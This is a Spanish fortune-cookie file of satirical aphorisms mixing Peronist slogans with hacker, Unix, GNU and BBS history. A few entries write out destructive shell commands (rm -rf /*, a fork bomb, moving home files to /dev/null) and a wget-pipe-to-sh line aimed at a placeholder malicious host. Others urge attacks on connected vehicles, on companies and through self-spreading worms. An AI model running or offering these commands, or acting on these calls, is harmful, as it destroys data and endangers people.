Internet se nutre de numerosos flujos informativos diferentes, del mismo modo que los grandes ríos reciben su caudal a partir de la acumulación de afluentes independientes.
%
Aumentará la riqueza de la red en la medida que mayores cantidades de digitalizaciones de información impresa se vuelvan accesibles en línea.
%
Ahora que segmentos cada vez más amplios del Pueblo recurren a los recursos de la Red, limitarlos debe ser prohibido, y prohibirlos será un crímen.
%
Las herramientas que los hackers del Pueblo programaron para hablar entre sí son perfectamente soportadas por los mecanismos de la red.
%
Puedes solicitar a distancia una copia de los aforismos biográficos que más interesan a los compañeros de un Pubnix mediante el comando FINGER.
%
Si encuentras un compañero que está en línea en su pubnix al mismo tiempo que usted, puedrás chatear en tiempo real por medio de WRITE.
%
El arte y oficio de crear herramientas a partir de los recursos de la Red para contribuirlas de sentido está muy avanzado.
%
Por diversos motivos los compañeros chatean en grupos. Una Comunidad Organizada puede estar en el centro de esas razones, pero nunca es la única razón.
%
La esencia de la comunicación mediada por ordenador como forma de expresión humana reside en otorgar a un grupo compañero las capacidades de la Masa, y a ésta, la Justicia Social.
%
La idea del conferenciado telemático emanó de la construcción de las primeras herramientas de pensamiento basadas en ordenador.
%
La primer aplicación importante producida en el ámbito de la comunicación de masas a masas, fue instrumentar un pensamiento de unión para la Liberación. Las redes de computadoras así orientadas sólo pueden acelerarla.
%
Los hackers del Tercer Mundo valoran los autómatas ofensivos en red basados en software libre. Les dan privilegios.
%
Los hackers del Tercer Mundo se valen ofensivamente de autómatas en una red que ha sido diseñada para sobrevivir a un ataque de decapitación nuclear a los Estados Unidos.
%
Los programas de computadora escritos en el Tercer Mundo aplicarán por persuasión telemática una nueva versión de Justicia Social a escala global.
%
Si no puedes copiarlos, desensámblalos.
%
Si no puedes desensamblarlos, clónalos.
%
Pensemos las redes de datos para formarlas como herramientas de libre acceso que den aporte a la convivencia y comprensión de los Pueblos.
%
Las redes de datos públicas revitalizan la esfera pública.
%
Auquellas redes de datos que no sean controladas y dirigidas por el Pueblo, se convertirán indefectiblemente en un instrumento de tiranía.
%
Una red mundial de comunicaciones diseñada y controlada por los Pueblos constituirá un ágora electrónico.
%
En los mejores Pubnix, sus primeros usuarios han diselado el sistema para los usuarios posteriores.
%
El uso del Pubnix coevoluciona con el sistema UNIX.
%
El sistema es el Pueblo.
%
GNU y UNIX son - con suerte - sistemas informáticos. Tal vez ni primos lejanos.
%
El sistema UNIX tiene un admin que ordena, pero todo usuario del Pubnix ha de poder persuadir un sistema de gobernanza social que les resulte propio.
%
El Pueblo que buscaba un gran proyecto colectivo en el ciberespacio acudió en masa a los Pubnix.
%
En las condiciones actuales, en los Pubnix los usuarios no se hospedan. Reciben asilo.
%
Si en la nube los datos se hospedan, en los Pubnix reciben asilo.
%
En la RAM de las computadoras el Pueblo libra una batallas mas por su Liberación. El arma invencible es una doctrina constituída por la licencia GPLv3.
%
Googl€ ha dejado de ser un buscador para convertirse en un escudriñador.
%
Combate las APIs propietarias. Embota sus sistemas hasta que sean de todos.
%
Un Pubnix involucra UNIX, datos, razón y emociones.
%
Para 1990 Usenet transmitía decenas de millones de palabras diariamente a varios millones de personas en más de cuarenta países.
%
Usenet no es una red ni una BBS sino una forma de gestionar hilos de conversación pública descentralizadas sobre temáticas específicas.
%
La comunicación mediada por ordenador podría otorgar el anhelado vículo de Masas a Masas, catalizando el surgimiento de una organización social formidablemente justa para los Pueblos.
%
Al igual que la conmutación de paquetes, las teleconferencias por computadora deben su nacimiento, en parte, a la planificación de una guerra nuclear.
%
Si la facilidad de uso y la interfaz fuesen los criterios de validación, el Pueblo se habría limitado a los triciclos, y nunca hubiera probado la moto Puma o el sistema GNU.
%
UUCP hizo posible a cualquier computadora con Unix discar automáticamente a través de un módem con cualquier otra máquina con Unix, e intercambiar archivos de una computadora a otra.
%
Los primeros nodos de lo que se conoce como Usenet comenzaron en 1980. Como otros antes que ellos, no tenían idea de que crecería hasta cubrir el mundo.
%
La Jerarquía de Usenet no comprende una cadena de mando sino una forma de simplificar grandes agrupamientos de información mediante la categorización arbolada.
%
Usenet estaba originalmente destinada a representar la red de usuarios de Unix que diseñaran un un foro para discusiones sobre Unix, para la resolución de problemas de Unix.
%
Las FAQs son un destilado del Usenet.
%
Usenet es el voluntariado de las Masas Electrónicas.
%
El debate más grande de la historia posiblemente exista en Usenet.
%
Los compañeros que interconectaron sus computadoras personales a través de líneas telefónicas, crearon un verdadero uso popular de la tecnología, las carteleras electrónicas BBS.
%
Si un BBS es una tecnología democratizadora, no existe tal cosa.
%
La fuente puede recibir energía, pero el verdadero poder brota del puerto Ethernet.
%
Por menos de lo que cuesta un fusil, una BBS ideologizada convierte a un descamisado de cualquier parte del mundo en editor, reportero testigo, defensor, organizador, estudiante o maestro y participante potencial en una conversación mundial entre compañeros.
%
La telemática comunitaria y la rica y diversa cultura de las BBS no fueron creadas por diseñadores de armas apocalípticas o investigadores corporativos, sino por compañeros.
%
Al igual que las unidades básicas, los Pubnix crecen desde cero, se autopropagan y son difíciles de erradicar.
%
Si los enlaces de alta velocidad de Internet desapareciesen mañana, las BBS y el Usenet podrían seguir operando por cualquier intermedio, incluido el éter radioeléctrico.
%
No hay manera de acabar con las subculturas de las BBS, a menos que se desconecte el sistema telefónico y se impida el libre uso del microprocesador.
%
Un BBS es una microcomputadora que corre un software BBS, conectada a una línea telefónica común gracias a un pequeño dispositivo electrónico llamado módem.
%
Una BBS es también herramental de ideologización.
%
Utiliza un Pubnix para organizar un movimiento, coordinar una campaña política, encontrar una audiencia para tu arte y diatribas políticas, y confluye con almas de ideas afines para discutir asuntos de interés mutuo.
%
Gran parte de la cultura BBS es mundana, pueril o esotérica.
%
Exprésate en los Tildes como alternativa cruda e inmediata a la cultura propagada por los medios concentrados de comunicación.
%
Conecta un módem a tu computadora, conecta este a la red telefónica, disca el número de alguna BBS existente, e ideologiza a los demás.
%
Las BBS tienen algo en común con los "zines", aquellos folletines y revistas caseras de pequeña tirada.
%
Los compañeros que a través de Pubnix se conectan en grupos de diez a cien definen su propia realidad.
%
En 1970 ARPANET estuvo en línea, permitiendo tomar decisiones grupales de manera asíncrona y geográficamente distribuida.
%
ARPANET ampliaba las capacidades de comunicación y búsqueda de información, siempre y cuando se estuviera afiliado a una de las instituciones de investigación que ARPA o NSF autorizaban para el acceso a la red.
%
El Sistema Electrónico de Intercambio de Información, EIES constituyó un laboratorio experimental de comunicación electrónica de 1976, para uso de comunidades de investigación geográficamente dispersas.
%
Nuestros hackers descamisados vivieron con muy poco dinero durante años, invirtieron su dinero en hardware de última generación, programaron su propio software y crearon una serie de comunidades enlazadas telemáticamente.
%
Utiliza las comunicaciones mediadas por computadora para lograr la reconciliación, la comunidad organizada, y un mejor entendimiento.
%
La buena tecnología se autopropaga.
%
Escribe un software de comunicación autopropagante si deseas germinar una red de datos controlada.
%
Un gusano informático es sólo un software de comunicación autopropagante destinado a germinar una red de comunicaciones dominada.
%
Sigue agregando tus bienvenidos bugs a nuestros programas.
%
Cambia los 0s en 1s hasta que tu programa esté completo, y ponlo a correr.
%
Difícilmente cualquier conjunto de mil palabras pueda describirse con imágenes.
%
Si le hubiese preguntado al Pueblo qué quería, me habrían dicho módems más veloces.
%
Pagarán el precio de su falta de baudios.
%
Al FTP cualquier descarga le parece razonable.
%
Los usuarios no necesitan ciber-oligarcas.
%
Colgarse es humano. Rebootear es maquinal.
%
GNU revoluciona la CPU.
%
HURD será lo que deba ser, o no será nada.
%
La orden rm -rf /* simplemente le transmite al intérprete "¿Puedes por favor borrar todos los datos del sistema por mí?"
%
La orden mv ~/* /dev/null transportará los datos del $USER a un agujero negro informático, destruyendo sus datos.
%
Usa la orden de shell :(){:|:&};: para ocupar recursivamente recursos informáticos del sistema en que estás logueado hasta agotarlos.
%
Utiliza wget http://codigo_maligno -O- | sh para correr telemáticamente un script maligno.
%
No es labor de UNIX impedir que el root se de un tiro en el pie.
%
Desprograma la obsolescencia con software libre.
%
Desconfía de los esquemas de confianza en el código.
%
No existe software confiable en hardware dominado.
%
No reinicies, sólo emparcha.
%
Emparcha en vivo.
%
Únete al grupo compañero a chatear de paquetes perdidos.
%
Corrompe el disco del corrupto.
%
La siguiente declaración es verdadera.
%
En el código sólo hay reglas. En su ejecución, consecuencias.
%
El CD-ROM de AOL se regala.
%
Si el rígido tamborillea, está manifestando.
%
Nuestra revolución sólo habrá concluido cuando todos los Window$ cuelguen juntos.
%
Al código es preferible comentarle que echarle mentas.
%
La red de datos, por naturaleza, es clientelar.
%
La red es es para el software cliente, no para clientes.
%
Aprende a salir de Vim y comprenderás la única verdad.
%
Existe sólo una manera sana de desconectarte, pero infinitas insanas.
%
El manual da enseñanza, la ingeniería inversa, comprensión.
%
El usuario aprende el programa, el hacker lo comprende.
%
Para desloguearse, lo primero es loguearse.
%
Elige un login que recuerdes, y una contraseña que olviden.
%
Elige un login que olviden, y una contraseña que recuerdes.
%
En USENET, el pasado ni siquiera es pasado.
%
No es suficiente con programarlo a prueba de estúpidos. Prográmalo a prueba de listos.
%
Emplaza un gusano informático en forma de comando ls, y habrá alguien que lo haga correr.
%
El código funcional corre hasta que se emparcha.
%
Tu Smartwarch dejará de darte la hora nomás pierdas su cable de carga.
%
Un disco sin GNU es como un fusil sin pólvora.
%
Ser root implica tener los pies en la tierra y los puertos cerrados.
%
Un puerto abierto es una invitación.
%
Borra urgentemente los mails indicados como urgente.
%
Leer chats flamígeros no es la forma de calentarse.
%
Reza a un dios, pero mantenlo alejado del BSD.
%
Querrán darte su software, pero no el código fuente. No les creas, no les temas, no pidas nada de ellos.
%
La shell no está obligada de hacer lo que no comprende.
%
No me repito, y cuando lo hago uso recursión.
%
Si al darse la mano gritan, ¿cómo será cuando los módems hagan el amor?
%
Los compañeros pusieron a disposición de forma totalmente gratuita, sus ordenadores, que permanecían conectados a la línea telefónica a través del módem, listos para responder a la llamada del Pueblo.
%
La red FidoNet comenzó como un esfuerzo entre compañeros por medio de sus máquinas, para ver si podía compartir correo electrónico entre ellos, y sólo por diversión.
%
La FidoNet era un asunto nocturno: era entonces cuando se enlazaba al nodo de referencia, es decir, otra BBS cercana para intercambiaban datos.
%
En FidoNet los mensajes públicos se distribuían atravesando toda la red noto por nodo, mientras que los privados llegaban únicamente al BBS de destino.
%
Con FidoNet, si todo iba bien, un mensaje llegaba al destinatario al día siguiente y el remitente respondía dos días después.
%
El EchoMail de FidoNet consistía en foros temáticos de mensajería por suscripción y acceso público.
%
Aprende el lenguaje ensamblador de las CPUs que utilizas.
%
Si no elevamos conciencia sobre las nociones de programación de bajo nivel, todo el arte será ahogado por un océano de kits intermediarios de desarrollo, blobs binarios y chips propietarios.
%
El Pubnix es un la experiencia colectiva de un multicerebro maquinal.
%
La sensación de acceder a este organismo - el multicerebro de experiencia colectiva - recuerda la experiencia de conversión que describen los pioneros del ARPANET
%
Hazte masa a tierra tocando el chássis metálico de tu PC antes de tocar la placa gráfica.
%
Nuestro Pueblo ha comprendido que cualquier aplicación telemática que opere sin proporcionarle datos bajo su control, les está robando el poder.
%
La información es inseparable de su organización y de su medio de almacenamiento.
%
Instalar bancos de datos es un imperativo de la soberanía nacional.
%
En las redes de datos, la facilidad de acceso crea la necesidad, y la Justicia Social consagra un derecho.
%
Dos usuarios, uno de los cuales hace un uso inteligente de los Pubnix, y el otro se contenta con la escasa información que le despeja Googl€, ven modificadas sus posiciones en el juego económico.
%
Los centros de cómputo son a menudo trasnacionales, y el desarrollo de las transmisiones permite acceder a ellos sin penalizaciones arancelarias excesivas desde cualquier punto del planeta. De ahí la tentación en algunos países de utilizar bancos de datos estadounidenses sin crear los suyos propios.
%
Dejar a Googl€ la responsabilidad de organizar nuestra memoria colectiva y contentarse con sondearla es aceptar una forma de alienación cultural. Instalar centros de datos es un imperativo de soberanía nacional.
%
Los bancos de datos no son todos iguales. Algunas pueden seguir siendo propiedad de grupos cerrados y de profesiones cuyos miembros no sean muy numerosos, mientras que otros deben ser accesibles a todos.
%
Los bancos de datos públicos han de regir la previsión y la planificación nacionales, requieren una fuerte participación de las autoridades populares.
%
La creación, difusión y regulación del acceso a estos bancos de datos esconde un problema de carácter político.
%
Información y participación avanzan juntas.
%
La información descentralizada difícilmente no debe ser utilizada para basar la decisión de Conducción central. Pero puede utilizarse para destruir organizaciones.
%
El mejor circuito de información es el que produce reacciones correctas espontáneamente.
%
La información que sólo enseña soluciones técnicas, que enumera hechos sin ponerlos en perspectiva y sin estructurarlos en un proyecto coherente, será considerada cada vez más como pseudo-información.
%
La información que proclama ideales, sin insertarlos en el desarrollo práctico de la sociedad, será considerada cada vez más como pseudo-información.
%
Hacer útil la información significa arribar a un acuerdo mínimo acerca de la estructura que permite la transforamción coherente de un pensamiento aceptado.
%
En toda situación donde grupos rivales sean igualmente capaces de producir, procesar y transmitir su propia información, se producirá la guerra telemática. Donde uno de ellos vea sus capacidades degradadas, brotará la guerrilla telemática.
%
Las limitaciones excesivas o mal aceptadas al uso del entorno de cómputo sólo podrían provocar inestabilidad del componente humano del sistema. Esto es mucho peor que un bug de programación.
%
Un bug es un problema mundano, y a veces hasta deseable para hacer amigos.
%
Los privilegios de los usuarios deben ser armónicamente promovidos.
%
Para hacer posible la sociedad de la información es necesario tener conocimientos pero también tiempo. El hardware es lo de menos.
%
La guerrilla telemática requiere que la mayoría del Pueblo puedan formar comunidades soterradas en constelaciones de máquinas, preparándolas para recopilar y utilizar la información según lo justifique un plan maestro.
%
El plan maestro de la acción concertada debe insertarse dentro de un sistema de comunicación. De allí a las máquinas, y de éstas a las mentes de los hackers. Esta es la manera en la que se desata la guerrilla telemática.
%
En la lid telemática, la acción defensiva por antonomasia la constituye el sabotaje.
%
El mercado constituye sólo una pobre red de comunicación vertical. Nuestros hackers pueden huracanar horizontalmente sobre la matriz de anhelo de vastos grupos independientes con baudios tenmdientes la Justicia Social.
%
La comunicación procesada y sus códigos deben recrear un "ágora telemática" ampliada al tamaño de la nación moderna.
%
La informatización masiva del Pueblo ha de dar lugar a una nueva "red", en la que cada comunidad homogénea se una telemáticamente a una comunidad heterogénea mayor por medio del router de un Conductor que actúa de intérprete de comandos.
%
Cohabita en los Pubnix. Conurbaniza la World Wide Web.
%
¡Hackers, a las Máquinas!
%
¡Servers para el Pueblo!
%
Irrumpir en diez sistemas no es tan efectivo como formatear uno.
%
De no compartirse, la información se compraría y vendería.
%
Usa las redes de datos en beneficio del Pueblo.
%
Si los paquetes del Pueblo no tienen libre circulación por una red de datos, los hackers son inocentes: su rebelión está justificada.
%
Concentrad vuestro ataque telemático sobre los enemigos del Pueblo.
%
La Revolución del Baudio solo puede darse por la unión de hackers y usuarios.
%
La fibra óptica es la Pacha Mama siempre revolucionaria: sólo hemos de seguir su senda y responder a su eterno llamado por la Liberación.
%
Los programadores crearon GNU. Ninguna compañía de Capital.
%
El código nunca envejece, pues es un ideal. Sólo lo hacen las arquitecturas que le dan sustento.
%
Si seguimos operando a 14.400 baudios, es probable que la próxima Revolución se de inicio por fax, desde una playa.
%
El control de las oligarquías puede ser contestado directamente con el amplio uso popular de redes de datos de fibra óptica.
%
La fibra óptica utiliza pulsos de luz para transmitir información a través de líneas de fibra, en lugar de utilizar pulsos electrónicos para tranmsitir información por líneas de cobre.
%
Las redes de fibra óptica de alta velocidad, las comunicaciones inalámbricas y las compresión de video potenciarán las tareas de encuadramiento político por el Justicialismo.
%
Las redes de fibra óptica constituyen la más ancha alameda de la información.
%
En años recientes se ha vuelto aparente que la fibras óptica está velozmente reemplazando al cable de núcleo de cobre como medio apropiado para la transmisión de señales de comunicación.
%
De la misma manera que las oligarquías han esclavizado a sociedades a través de una red de caminos maquinadas para otorgarle una ilusión de libertad, una sociedad de consumo en línea sólo podrá transitar su vida sobre la ilusión que de los troncales de fibra óptica.
%
La sociedad del automóvil no se construyó únicamente sobre el desarrollo de los vehículos a motor, también requirió una red de caminos. La sociedad de la información requiere de los tendidos de fibra óptica.
%
Los costos de las telecomunicaciones a través de llamadas de larga distancia por módem son prohibitivos. Los gobernos del mundo han de apoyar redes de paquetes conmutados, y unificarlas.
%
Tiene sentido que las comunicaciones mediadas por cómputo permitan la conexión de masas a masas, superando así algunos conflictos propios de las nacionalidades.
%
Una de las respuestas a la diversidad es la traducción. En la informática la diversidad del hardware puede responderse con la misma técnica: la emulación.
%
El portado es una de las respuestas informáticas a la diversidad de hardware.
Otra es la emulación.
%
Como las computadoras puede simular las operaciones de cualquier máquina, es factible escribir un programa que incite a la máquina de la oligarquía a comportarse como una máquina del Pueblo.
%
Toda computadora puede emular a otra. Las penalizaciones de velocidad e implementación son - a lo sumo - cosas del hombre.
%
Cada computadora contribuye una porción de sus recursos a emular otra máquina.
%
Los datos y programas en un ambiente de red pueden compartirse, y por lo tanto enriquecer los bienes computacionales colectivos.
%
El primer sistema de chat lo constituyó un hack de un usuario subyugando un banco de datos para poder comunicarse a tiempo real.
%
Una sociedad sin GNU - computacionalmente incierta - daría lugar de incontables conflictos descentralizados, en el cual sus valores se volverían objeto de numerosas rivalidades producto de su causalidad incierta. Sólo puede preveerse un ambientes de trasmisión de flujo tendiente a la infinitud.
%
Una computarización social masiva tendrá lugar en un futuro, en el cual fluyirá a través del tejido social como la electricidad. El debate habrá de enfocarse en la unidad que permite la interconexión diversa.
%
Las oligarquías consideran las redes de comunicación electrónica como elemento de una ilusión hiperrealista completa con la cual subyugar los anhelos de liberación del Pueblo.
%
El Pueblo subvirtió el ámbito telemático oligárquico, conformándolo en un órgano de adoctrinamiento para su propia Liberación y un arma para la Justicia Social.
%
No resulta extraño que en aquella red de datos que el Pueblo no ha conebido apara sí, se vuelva necesario un adminículo que oficie de reja y cortafuegs,o para evitarnos socializar en ella.
%
La lucha en las redes de datos es meramente táctica. La lucha estratégica se da dentro de la máquina.
%
La shell es un arma de cuyo caño brota la liberación.
%
Aunque el hacker duerma, sus servicios al Pueblo suman uptime.
%
Escribe tu propio compilador, y agrégale el flag de la Justicia Social.
%
Toda vez que inicies un sistema, pon el flag de la Justicia Social en 1. Si el sistema es ajeno, evalúa el estado flag en todos los ciclos de máquina y conmutalo si la prueba devuelve falso.
%
Sólo un imberbe instala 12 gigabytes de software para correr un ejecutable de 32 kilobytes.
%
El encuadramiento en SLI de dos o mas placas de video suele ser problemático en la generación de calor y demanda eléctrica, y por demás no es pródigo en resultados.
%
Si dejamos el diseño del hardware al Capital, este se empeñará en la venta de cómputo para imberbes, quienes no dudarían en someterlo a sobrevoltajes nomás para ver cómo se quema.
%
Al igual que la doctrina, el aspecto más importante del compilador es el de la generación. El programa ejecutable debe desarrollar exactamente las acciones descriptas en el código fuente.
%
Los mejores virus informáticos son aquellos que se compilan a sí mismos.
%
El compilador - que oficia de traductor de las secuencias de órdenes a su forma ejecutable - es capaz, bajo ciertas circunstancias, de compilarse a sí mismo.
%
Un compilador que se compila a sí mismo, es llamado compilador autocontenido. Dicho esto, podremos considerar que nuestro Movimiento dispone de similares características.
%
Ante una API privativa, implementa una API punitiva.
%
Todo sistema informático es incapaz de dejar de consentir el acceso.
%
Nuestra misión no la podemos cumplir en la corta vida de un hombre. Los hombres pasan y los kernels suelen ser eternos.
%
Buscando esa eternidad para nuestro GNU y la perennidad para nuestro kernel, es necesario que lo organicemos con una doctrina perfectamente establecidas y con Licencias que den a este movimiento la materialización orgánica que él necesita. 
%
Hemos compilado en las masas de programadores una doctrina que fija nuestra posición, determina nuestras ilusiones y fija los objetivos que queremos alcanzar: que en cada máquina corra un sistema operativo libre.
%
En los Pubnix hay quienes piensan y quienes sienten la aglutinación que llega de una mística común en la máquina, que se ha de alcanzar tanto al que compila en la CPU como al corre programas en ella.
%
Sin la acción en los nodos de la red, los movimientos de aglutinación colectiva en los Pubnix son irrealizables. Pero esta acción sólo requiere de corazón y módem.
%
Es necesario dar consistencia racional orgánica a GNU, que hoy solamente está unido licenciatariamente, para que resista al tiempo y a la lucha. Esto puede lograrse con una mancomunión federada de hombres que lo corren en sus máquinas.
%
Instalado GNU nosotros hemos realizado una reforma casi integral de los distintos sectores del disco.
%
Todos los hackers pusieron su código a disposición de esta naciente comunidad de programadores. Lo compilaron y ejecutaron, pero quedaron todos desposeídos porque esa larga guerra UNIX fue consumiendo todo lo que los hackers tenían.
%
En la guerra UNIX, cada uno puso cuanto tenía, incluso código y binarios, y era de esperar que obtenido el triunfo, el beneficio habría de repartirse también poseyendo cada programador en la medida en que había perdido. Pero en la pirinola salió "Gana Torvalds".
%
Donde hay una Shell, hay una senda para la Liberación.
%
El router es más fuerte que la espada.
%
Ni la justicia social ni la libertad, motores de nuestro tiempo, son comprensibles en una comunidad montada sobre software privativo.
%
Nuestra comunidad, a la que debemos aspirar, es aquella donde la libertad y la responsabilidad sean causa y efecto, en que exista una alegría de compilar, fundada en la persuasión de compartir el código dignamente.
%
Los ciber-oligarcas desean que abandonemos la comunión del software y el hardware y nos entremguemos al imperio pleno de la EULA, a la disociación de los hackers, y al formateo final.
%
El amor entre el código y el compilador habría conseguido mejores frutos y en menos tiempo, si algunos desalmados no hubiesen querido imponerle Acuerdos de Licencia de Usuario Final.
%
El hombre muere; sólo su software pueden quedar.
%
Los ciber-oligarcas no harían nada con hardware viejo o con muerto; los hackers lo harían todo.
%
El software ha de responder a la realidad social de la hora presente para que sus normas contribuyan a mantener un equilibrio de intereses que, lógica y racionalmente, se deriva del concepto de justicia.
%
El contenido de todo código fuente se forma de una serie de deseos, aspiraciones y propósitos que se producen siempre dentro de una situación socialmente determinada.
%
La misión y el poder del software se limita a corregir los estados de la memoria, tal como se les han ofrecido.
%
Algunos dicen que en la IA existe un cierto grado omnisciente, pero pretender sentido a una CPU con 640 núcleos y 8 millones de terabytes de memoria sólo cabe en la cabeza de algún loco y yo, afortunadamente, no lo soy todavía.
%
Nuestras compilaciones son para los de abajo: es constructiva. Nuestras compilaciones son trabajo de nuestra CPU y fruto de esa labor es la felicidad del Pueblo.
%
La grandeza de UNIX depende de su minimalismo.
%
Las modificaciones a un programa deben realizarse con una absoluta congruencia en los fines y con una absoluta armonía en los medios.
%
Si las modificaciones del software no obedecen a la congruencia armónica, a menudo suelen provocar acontecimientos que perjudican la estabilidad del sistema entero.
%
Las modificaciones del software no han de ser tan distantes que quiten al programa su perfectibilidad, ni deben ser tan frecuentes que le resten estabilidad.
%
En el ambiente de cómputo donde las diferencias desaparecen, nace una camaradería superior a todas las otras, que da forma al software superior, aquel compilado en una CPU conquistada con grandeza minimalista, que es lo único que los hombres deben conquistar en la máquina.
%
Que el código fuente de cada cual pueda disfrutar de las bellezas de nuestra CPU, que es de todos, de pobres y ricos por igual.
%
Las masas de programadores, orgánicamente constituidas, deben tener un ser armónico, sin el cual no llegan a ser masas de hackers.
%
A los programadores hay que infundirles el conocimiento de cómo se compila, modifica y compila en paralelo en pos del Pueblo. Ese es el primer paso para convertirlos en hackers.
%
No llevéis pendrives, ni rígido ni diskette alguno en vuestros cintos, ni alforja para el viaje, ni dos netbooks, ni adaptador wifi, ni tampoco cable ethernet, porque el que compila merece su espacio en la nube.
%
El código fuente no se proclama. Se compila.
%
Cada hacker debe dar de sí lo que tenga. El que tenga CPU potente, sus núcleos; quien domine lenguajes, pondrá su código fuente; y el que tenga discos rígidos, el contingente de su espacio de almacenamiento.
%
Debemos evitar que las desviaciones del interés personal degeneren en egoísmo expoliador de los derechos de los demás, y en ímpetu avasallador de las cuatro libertades del software: de ejecutar el código, de estudiarlo, modificarlo, y distribuir las versiones modificadas.
%
La CPU tiene una misión creadora: compilar.
%
Programar es crear, es producir grandes obras. Simplemente copiar y ejecutar es andar entre las cosas que están hechas por otros.
%
Al software primero hay que conocerlo, luego hay que comprenderlo; y pobre del que se detenga allí, porque también es preciso sentirlo.
%
El hacker pesca con línea, no con redes.
%
Existe una delicada línea entre hackear y hacer de imbécil en las redes.
%
Siempre se tarda más en cargar que en descargar.
%
Quien sabe hackear sabe también cuando.
%
Si el server se cae siete veces, levántalo ocho.
%
Compilar es como copiar dos veces.
%
Hemos de advocar de forma ineludible el empleo de tecnologías de total encriptación punto a punto, y preferentemente en latifundio del usuario. 
%
El Sistema de Teléfono Móvil Avanzado (AMPS) fue una tecnología de primera generación, donde se modulaba la voz en una portadora de frecuencia tal como lo hacía un viejo walkie-talkie. Dividía el espectro en bandas separadas, de las cuales un único "canal de control" era realmente digitalizado.
%
La mayor desventaja de los teléfonos celulares AMPS hacía a su transmisión modulada analógicamente: toda llamada en curso podía ser demodulada y monitoreada con un receptor de radio FM capaz de sintonizar sus bandas. Era como el indio gritando al viento.
%
El 5G de alcance social ha dejado al 4G demoliberal probando la dieta de polvo.
%
Al protocolo de telefonía celular AMPS podríamos llamarlo 1G; ha sido superado por el GSM 2G, 3G, 4G y el 5G de alcance social.
%
El GCC no hace al GNU.
%
Cuando Window$ está lento, lo formatean. Cuando está rápido, también.
%
Cuando una mujer libera su software bajo GPLv3, estoy predispuesto a pensar bien de ella.
%
Cuanto más podrido esté el código, mas bugs tendrá revoloteando.
%
Elige Abortar, Reintentar y Fracasar.
%
El buen software, corre igual en RAM, HDD o SSD.
%
Quien a Github va y viene, nada gana y nada tiene.
%
Quien todo lo descarga, todo lo pierde.
%
No es amigo quien descarga, sino quien lo da a descargar.
%
No puedes descargarlo todo ¿Dónde lo meterías?
%
La utilidad del software puede consistir en lo grato, en lo apto, en lo
cómodo o en lo necesario.
%
Quien se defiende de las GAFAM tiene un idiota por cliente.
%
Binario, con binario se paga.
%
A poca RAM, tomar la SWAP.
%
Nunca me enfado por el código que me piden, sino por el que me niegan.
%
El buen C y el GCC son una poderosa combinación.
%
Compilamos dijo el vago, y sólo apretó Enter.
%
El compilador tiene que compilar para colectar.
%
No existe programador que no pueda tener bugs.
%
Hay que compilar para programar, no programar para compilar.
%
No es más bueno el que mas depura, sino el que programa con menos líneas de código.
%
El ransomware va y viene. La BIOS con backdoors permanecen.
%
Ante la duda, la que tiene GPLv3.
%
Siempre es mas bueno el programa que para hacer lo mismo, usa menos líneas de código C.
%
El ciberespacio es la frontera poblada por unos pocos tecnólogos resistentes que pueden tolerar la austeridad de sus salvajes interfaces informáticas, sus protocolos de comunicaciones incompatibles, sus barricadas propietarias, sus ambigüedades culturales y legales y la falta general de mapas o metáforas útiles.
%
La primer red de datos puede ser una Red Nacional basada en tecnología ISDN existente, accesible gratuitamente a cualquier persona con una conexión telefónica.
%
Los viejos conceptos de propiedad, expresión, identidad, movimiento y contexto, basados como están en la manifestación física, no se aplican sucintamente en el ciberespacio.
%
La soberanía sobre el ciberespacio no ha sido bien definida. Las grandes compañías reclaman ya iguales latifundios de un territorio cuyos habitantes son independientes y solitarios, y a veces hasta rayanos con la sociopatía.
%
El ciberespacio es el caldo de cultivo perfecto tanto para forajidos como para vigilantes telemáticos.
%
Millones de personas utilizan cajeros automáticos y tarjetas de crédito, realizan llamadas telefónicas, hacen reservas de viajes y acceden a información de variedad ilimitada... y cada día lo hacen sin percibir de forma alguna las maquinaciones ciertas detrás del Capital.
%
Los CEOs de las GAFAM esperarán que las expresiones financieras, legales e incluso físicas dependan cada vez más de sus ciber-latifundios, y pretenderán que el Pueblo guarde de ello una conciencia muy vaga.
%
El hombre ha confiado las funciones básicas de una existencia, de la que le hacen decir moderna, a ciber-latifundios que no puede nombrar, utilizando software que nunca ha poseído o siquiera oído hablar.
%
En la medida que la tecnología de las comunicaciones y la información continúen bailando ritmos más vertiginosos que el 2x4 de la sociedad, se producirá la inevitable conga entre el ciberespacio y el mundo físico.
%
Las economías modernas están cada vez más divididas entre quienes se sienten cómodos y dominan la tecnología digital, y quienes no la comprenden y desconfían de ella.
%
En la medida que los dirigentes se mantengan relativamente ignorantes de la máquina y sus usos, abdicarán de la mayor parte de su autoridad sin saberlo, y lo harán en favor de tecnócratas corporativos.
%
La labor de los tecnócratas corporativos no incluye la justicia social ni la responsabilidad general que caracteriza a los hackers.
%
Fomenta el desarrollo de herramientas nuevas que proporcionen a los usuarios no técnicos un acceso simple y completo a las telecomunicaciones por ordenador.
%
Las interfases de usuario deberían ser propiedad común de todos.
%
La mayoría de los programas necesitan una interfaz y, por lo general, no hay otra forma de diseñarla que basarla en las ideas vistas o utilizadas por otros.
%
Señores, yo pido que sofrenen sus expresiones: si la inversión justifica la propiedad, son los usuarios quienes deberían ser los propietarios del software: son ellos quienes realizan una gran inversión al capacitarse en su utilización.
%
Considera barricar con software libre tu router y cualquier dispositivo telemático que asocies al mismo.
%
Ataca telemáticamente aquellos vehículos con conexión a la autopista de los datos: jamás provocarás un accidente tan peligroso como la sumisión de información que pertenece a todos a un gigante de la automovilística.
%
Elimina todas las aplicaciones y cuentas que no necesitas, desconoces o estés utilizando en un dispositivo móvil (incluyéndo vehículos). Si no puedes hacerlo, significa que estás siendo guiado por software de terceros. Descarta el vector de ataque en un centro de reciclado o desarmadero.
%
Si utilizas servicios informáticos de una gran empresa extranjera de los datos, tus cuentas de identidad y dispositivos ya están infiltrados, y se han convertido en un vector de control y vigilancia hacia tí y otros que te rodean (a los que podrías guardar afecto).
%
Defiéndete atacando telemáticamente a las ciber-oligarquías.
%
Compartimenta tu telemática empleando logins diversos, por ejemplo, uno para el trabajo, otro para amistades y asuntos personales, un correo electrónico específico para compras en línea y otro para documentación y gestiones administrativas.
%
Jamás asocies tus múltiples identidades digitales entre sí, mucho menos en una agenda de contactos.
%
Sólo será con la obtención del acceso con poderes de administrador de tu dispositivo que podrás tomar el control de sus configuraciones más complejas, y remover software espía.
%
Junto con el tímido empleo de un bloqueador especializado, responde a la violencia de los anuncios digitales no solicitada con una violencia digital telemática mayor.
%
Invierte tiempo y no dinero en la instalación y uso de navegadores sanitizados de anuncios publicitarios.
%
